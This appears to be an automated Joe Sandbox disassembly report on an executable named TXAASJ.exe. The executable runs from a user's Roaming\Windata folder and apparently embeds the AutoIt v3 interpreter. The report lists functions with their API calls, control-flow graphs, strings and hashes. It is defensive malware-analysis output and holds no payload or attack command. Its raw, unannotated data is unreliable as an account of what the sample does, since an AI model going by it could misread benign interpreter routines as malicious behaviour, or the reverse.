                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe$CMDLINE$CMDLINERAW
                                                                                                                        • API String ID: 861526374-2991882954
                                                                                                                        • Opcode ID: 112c0a8328f9ffa4c81757560754351a9c2f0df0989540c8ec7c281103c919c7
                                                                                                                        • Instruction ID: dc6d1c1c23d132e2ea59f9bb22fe592106bbac381a9fe335da7bb7db1fdb9917
                                                                                                                        • Opcode Fuzzy Hash: 112c0a8328f9ffa4c81757560754351a9c2f0df0989540c8ec7c281103c919c7
                                                                                                                        • Instruction Fuzzy Hash: 4181A472840219AACB05EBE4DD52EEFBBFCAF05355F201419FA01B7091EF606B49CB61
                                                                                                                        Function 00E52F58 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E52F8B
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00E52FB5
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E52FC6
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00E52FE3
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E52FF3
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00E53009
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E53018
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                        • Opcode ID: c7f4d87561e0d88428f44e0e3225a6a18fc81f5d1b6ff55d76f82544cd00f842
                                                                                                                        • Instruction ID: 4a9ebd716db42c2ddca221f09babc536361ed18f276f52ac2354ff8916f649a8
                                                                                                                        • Opcode Fuzzy Hash: c7f4d87561e0d88428f44e0e3225a6a18fc81f5d1b6ff55d76f82544cd00f842
                                                                                                                        • Instruction Fuzzy Hash: 1221EDB5D05308AFDB00AFA5EC89BCEBBB5FB08710F01821AF611B62A0D7B04148DF95
                                                                                                                        Function 00E6E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E6EA39
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E6EA56
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcsncat.LIBCMT ref: 00E6EA69
                                                                                                                        • __makepath.LIBCMT ref: 00E6EA85
                                                                                                                          • Part of subcall function 00E72BFF: __wmakepath_s.LIBCMT ref: 00E72C13
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • _wcscpy.LIBCMT ref: 00E6EABE
                                                                                                                          • Part of subcall function 00E6EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00E6EADA,?,?), ref: 00E6EB27
                                                                                                                        • _wcscat.LIBCMT ref: 00EC32FC
                                                                                                                        • _wcscat.LIBCMT ref: 00EC3334
                                                                                                                        • _wcsncpy.LIBCMT ref: 00EC3370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                        • String ID: Include$\
                                                                                                                        • API String ID: 1213536620-3429789819
                                                                                                                        • Opcode ID: 1db275f25edf7379491dbfc80bb147ea8ececaa12e84eee90891e56323c652b8
                                                                                                                        • Instruction ID: 69dc3990f5556aa74f5a888381552b0ffd449b1509623252597791825dbd0323
                                                                                                                        • Opcode Fuzzy Hash: 1db275f25edf7379491dbfc80bb147ea8ececaa12e84eee90891e56323c652b8
                                                                                                                        • Instruction Fuzzy Hash: 8B51A3B14043489FC354DFA9EC81CDAB7F8FB48300F41991EF559A3261EB749614EB66
                                                                                                                        Function 00E529C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 922 e529c2-e529e2 924 e529e4-e529e7 922->924 925 e52a42-e52a44 922->925 927 e529e9-e529f0 924->927 928 e52a48 924->928 925->924 926 e52a46 925->926 929 e52a2b-e52a33 DefWindowProcW 926->929 932 e529f6-e529fb 927->932 933 e52aac-e52ab4 PostQuitMessage 927->933 930 ec2307-ec2335 call e5322e call e6ec33 928->930 931 e52a4e-e52a51 928->931 940 e52a39-e52a3f 929->940 969 ec233a-ec2341 930->969 934 e52a76-e52a9d SetTimer RegisterWindowMessageW 931->934 935 e52a53-e52a54 931->935 937 ec238f-ec23a3 call e957fb 932->937 938 e52a01-e52a03 932->938 939 e52a72-e52a74 933->939 934->939 944 e52a9f-e52aaa CreatePopupMenu 934->944 941 ec22aa-ec22ad 935->941 942 e52a5a-e52a6d KillTimer call e52b94 call e52ac7 935->942 937->939 963 ec23a9 937->963 945 e52ab6-e52ac5 call e51e58 938->945 946 e52a09-e52a0e 938->946 939->940 948 ec22af-ec22b1 941->948 949 ec22e3-ec2302 MoveWindow 941->949 942->939 944->939 945->939 952 e52a14-e52a19 946->952 953 ec2374-ec237b 946->953 956 ec22d2-ec22de SetFocus 948->956 957 ec22b3-ec22b6 948->957 949->939 961 ec235f-ec236f call e95fdb 952->961 962 e52a1f-e52a25 952->962 953->929 959 ec2381-ec238a call e8b31f 953->959 956->939 957->962 965 ec22bc-ec22cd call e5322e 957->965 959->929 961->939 962->929 962->969 963->929 965->939 969->929 973 ec2347-ec235a call e52b94 call e53598 969->973 973->929
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00E52A33
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00E52A5D
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E52A80
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E52A8B
                                                                                                                        • CreatePopupMenu.USER32 ref: 00E52A9F
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00E52AAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                        • String ID: TaskbarCreated
                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                        • Opcode ID: b602ce0ac4d6728ece6d09755152a7d0da6d210bd203dd03bc4504e6c089c8a1
                                                                                                                        • Instruction ID: 0b9c931d365503cfa8a9ab68916bb782801950d935488ecb6500c675fc3902ed
                                                                                                                        • Opcode Fuzzy Hash: b602ce0ac4d6728ece6d09755152a7d0da6d210bd203dd03bc4504e6c089c8a1
                                                                                                                        • Instruction Fuzzy Hash: 44413E3110424A9BDB346F64AC09BF93795F716342F04A91DFF11B21A3E6719C59E361
                                                                                                                        Function 00E530A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E530B0
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E530BF
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00E530D5
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00E530E7
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00E530F9
                                                                                                                          • Part of subcall function 00E5318A: LoadImageW.USER32(00E50000,00000063,00000001,00000010,00000010,00000000), ref: 00E531AE
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00E53167
                                                                                                                          • Part of subcall function 00E52F58: GetSysColorBrush.USER32(0000000F), ref: 00E52F8B
                                                                                                                          • Part of subcall function 00E52F58: RegisterClassExW.USER32(00000030), ref: 00E52FB5
                                                                                                                          • Part of subcall function 00E52F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E52FC6
                                                                                                                          • Part of subcall function 00E52F58: InitCommonControlsEx.COMCTL32(?), ref: 00E52FE3
                                                                                                                          • Part of subcall function 00E52F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E52FF3
                                                                                                                          • Part of subcall function 00E52F58: LoadIconW.USER32(000000A9), ref: 00E53009
                                                                                                                          • Part of subcall function 00E52F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E53018
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                        • Opcode ID: 378f286eafba211caecb31e9b5279cf1ab6b80fc33258670280322bf5d107aea
                                                                                                                        • Instruction ID: 9071dc7a38bac7d2ea8e597a7fe5024faf1d5ce9ecb50b33e7c226e5de8dfac3
                                                                                                                        • Opcode Fuzzy Hash: 378f286eafba211caecb31e9b5279cf1ab6b80fc33258670280322bf5d107aea
                                                                                                                        • Instruction Fuzzy Hash: 0F214AB4E04308AFDB109FA9EC0AAD9BBF9FB48310F01852AE714B22A0D77546449F95
                                                                                                                        Function 00E7BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 986 e7ba66-e7ba93 call e77750 call e78984 call e77616 993 e7ba95-e7baab call e7f630 986->993 994 e7bab0-e7bab5 986->994 1000 e7bd05-e7bd0a call e77795 993->1000 996 e7babb-e7bac2 994->996 998 e7baf5-e7bb04 GetStartupInfoW 996->998 999 e7bac4-e7baf3 996->999 1001 e7bc33-e7bc39 998->1001 1002 e7bb0a-e7bb0f 998->1002 999->996 1003 e7bcf7-e7bd03 call e7bd0b 1001->1003 1004 e7bc3f-e7bc50 1001->1004 1002->1001 1006 e7bb15-e7bb2c 1002->1006 1003->1000 1007 e7bc65-e7bc6b 1004->1007 1008 e7bc52-e7bc55 1004->1008 1011 e7bb33-e7bb36 1006->1011 1012 e7bb2e-e7bb30 1006->1012 1015 e7bc72-e7bc79 1007->1015 1016 e7bc6d-e7bc70 1007->1016 1008->1007 1014 e7bc57-e7bc60 1008->1014 1013 e7bb39-e7bb3f 1011->1013 1012->1011 1018 e7bb61-e7bb69 1013->1018 1019 e7bb41-e7bb52 call e77616 1013->1019 1020 e7bcf1-e7bcf2 1014->1020 1021 e7bc7c-e7bc88 GetStdHandle 1015->1021 1016->1021 1023 e7bb6c-e7bb6e 1018->1023 1030 e7bbe6-e7bbed 1019->1030 1031 e7bb58-e7bb5e 1019->1031 1020->1001 1024 e7bccf-e7bce5 1021->1024 1025 e7bc8a-e7bc8c 1021->1025 1023->1001 1028 e7bb74-e7bb79 1023->1028 1024->1020 1027 e7bce7-e7bcea 1024->1027 1025->1024 1029 e7bc8e-e7bc97 GetFileType 1025->1029 1027->1020 1032 e7bbd3-e7bbe4 1028->1032 1033 e7bb7b-e7bb7e 1028->1033 1029->1024 1034 e7bc99-e7bca3 1029->1034 1035 e7bbf3-e7bc01 1030->1035 1031->1018 1032->1023 1033->1032 1036 e7bb80-e7bb84 1033->1036 1037 e7bca5-e7bcab 1034->1037 1038 e7bcad-e7bcb0 1034->1038 1041 e7bc27-e7bc2e 1035->1041 1042 e7bc03-e7bc25 1035->1042 1036->1032 1043 e7bb86-e7bb88 1036->1043 1044 e7bcb8 1037->1044 1039 e7bcb2-e7bcb6 1038->1039 1040 e7bcbb-e7bccd InitializeCriticalSectionAndSpinCount 1038->1040 1039->1044 1040->1020 1041->1013 1042->1035 1045 e7bb8a-e7bb96 GetFileType 1043->1045 1046 e7bb98-e7bbcd InitializeCriticalSectionAndSpinCount 1043->1046 1044->1040 1045->1046 1047 e7bbd0 1045->1047 1046->1047 1047->1032
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00E7BA74
                                                                                                                          • Part of subcall function 00E78984: __mtinitlocknum.LIBCMT ref: 00E78996
                                                                                                                          • Part of subcall function 00E78984: EnterCriticalSection.KERNEL32(00E70127,?,00E7876D,0000000D), ref: 00E789AF
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E7BA85
                                                                                                                          • Part of subcall function 00E77616: __calloc_impl.LIBCMT ref: 00E77625
                                                                                                                          • Part of subcall function 00E77616: Sleep.KERNEL32(00000000,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7763C
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E7BAA0
                                                                                                                        • GetStartupInfoW.KERNEL32(?,00F06990,00000064,00E76B14,00F067D8,00000014), ref: 00E7BAF9
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E7BB44
                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 00E7BB8B
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E7BBC4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426640281-0
                                                                                                                        • Opcode ID: 7c1995df7dbdfb4fc4b4ff35e844039b59ed7aa92356fb229f1fc0c25a39001f
                                                                                                                        • Instruction ID: 2f0494ebef60c4813ef0c2fc71af543ebe732ebf551ce488798740d0f11e5d7f
                                                                                                                        • Opcode Fuzzy Hash: 7c1995df7dbdfb4fc4b4ff35e844039b59ed7aa92356fb229f1fc0c25a39001f
                                                                                                                        • Instruction Fuzzy Hash: 9081D2709057458FCB14CF68C8807A9BBF0EF49328B24D25EE4AABB3D1CB349802DB55
                                                                                                                        Function 00E545A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1048 e545a7-e545e0 1049 e545e6-e545fe mciSendStringW 1048->1049 1050 ec5935-ec5936 DestroyWindow 1048->1050 1051 e54604-e5460a 1049->1051 1052 e547a6-e547b3 1049->1052 1053 ec5941-ec5944 1050->1053 1054 e547e7-e547f4 1051->1054 1055 e54610-e54625 call e53029 1051->1055 1056 e547b5-e547d0 UnregisterHotKey 1052->1056 1057 e547d8-e547df 1052->1057 1060 ec595a-ec5976 FindClose call e7017e 1053->1060 1061 ec5946-ec5958 call e550ec 1053->1061 1054->1053 1059 e547fa-e54801 1054->1059 1069 ec598d-ec5999 1055->1069 1070 e5462b-e54633 1055->1070 1056->1057 1063 e547d2-e547d3 call e6f902 1056->1063 1057->1051 1058 e547e5 1057->1058 1058->1052 1059->1055 1066 e54807 1059->1066 1077 ec5977-ec5987 call e7017e 1060->1077 1061->1077 1063->1057 1066->1054 1075 ec599b-ec599d FreeLibrary 1069->1075 1076 ec59a3-ec59aa 1069->1076 1073 e54639-e5465e call e62570 1070->1073 1074 ec59b1-ec59be 1070->1074 1087 e54695-e546a0 CoUninitialize 1073->1087 1088 e54660 1073->1088 1081 ec59e5-ec59ec 1074->1081 1082 ec59c0-ec59dd VirtualFree 1074->1082 1075->1076 1076->1069 1080 ec59ac 1076->1080 1077->1069 1080->1074 1081->1074 1086 ec59ee 1081->1086 1082->1081 1085 ec59df-ec59e0 call e9d323 1082->1085 1085->1081 1092 ec59f3-ec59f6 1086->1092 1091 e546a6-e5475a call e532c9 call e52e6d call e55cd3 call e54208 call e52e54 call e52de4 call e55cd3 call e62570 call e52e54 call e52c64 * 2 call e52e54 call e6f8a4 call e52c64 call e52e8f call e52f47 call e55cd3 call e55202 1087->1091 1087->1092 1090 e54663-e54693 call e52f0e call e52d7f 1088->1090 1090->1087 1134 e5475f-e547a5 call e53d9b * 2 call e55cd3 * 3 call e53282 1091->1134 1092->1091 1093 ec59fc-ec5a02 1092->1093 1093->1091
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E545F0
                                                                                                                        • CoUninitialize.COMBASE ref: 00E54695
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00E547BD
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EC5936
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00EC599D
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC59CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: cb192914b1c206933d456cb715004908318280e901464614754d9ad37676de5a
                                                                                                                        • Instruction ID: 626498a3381ea23c2fcf3d8430e5210efcfacba05a2e2311c43c21d4c64e7fda
                                                                                                                        • Opcode Fuzzy Hash: cb192914b1c206933d456cb715004908318280e901464614754d9ad37676de5a
                                                                                                                        • Instruction Fuzzy Hash: 73911775601602CFC715EF24D995B68F3E4FF05306F5066A9E90AB72A2DB30AD5ACF00
                                                                                                                        Function 00E6EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1202 e6eb05-e6eb2f call e5c4cd RegOpenKeyExW 1205 e6eb35-e6eb39 1202->1205 1206 ec4b17-ec4b2e RegQueryValueExW 1202->1206 1207 ec4b30-ec4b6d call e7010a call e54bce RegQueryValueExW 1206->1207 1208 ec4b91-ec4b9a RegCloseKey 1206->1208 1213 ec4b6f-ec4b86 call e57e53 1207->1213 1214 ec4b88-ec4b90 call e54fd2 1207->1214 1213->1214 1214->1208
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00E6EADA,?,?), ref: 00E6EB27
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00E6EADA,?,?), ref: 00EC4B26
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00E6EADA,?,?), ref: 00EC4B65
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00E6EADA,?,?), ref: 00EC4B94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                        • Opcode ID: 43f3606196d0335d63e0241a4fbdf6d54cbfde821c67b8d2ea88b91e55891f28
                                                                                                                        • Instruction ID: ba31dcac1fa352158706a4f6771aa535cbc4ae114de03c2aba5dab915cb975e9
                                                                                                                        • Opcode Fuzzy Hash: 43f3606196d0335d63e0241a4fbdf6d54cbfde821c67b8d2ea88b91e55891f28
                                                                                                                        • Instruction Fuzzy Hash: 39117F71605208BEEB049BA4DD96EFE7BBCEF04348F101459B506F2090EA719E05D760
                                                                                                                        Function 00E52E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1229 e52e9d-e52f0d CreateWindowExW * 2 ShowWindow * 2
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E52ECB
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E52EEC
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E52F00
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E52F09
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: c4c9b87f63a83fd3d14197945bb2b9b78c3c940ee6b61d3629f0ad32a18b0dd5
                                                                                                                        • Instruction ID: 1da0d2f6a84ecfe6c07b8895d6d1c73b5cad1167fca4fc10dbd9bbe7c2381998
                                                                                                                        • Opcode Fuzzy Hash: c4c9b87f63a83fd3d14197945bb2b9b78c3c940ee6b61d3629f0ad32a18b0dd5
                                                                                                                        • Instruction Fuzzy Hash: AFF030709452D87ED73057636C08EB73E7DE7CAF10B02801FBA08A2160C1610985EAB0
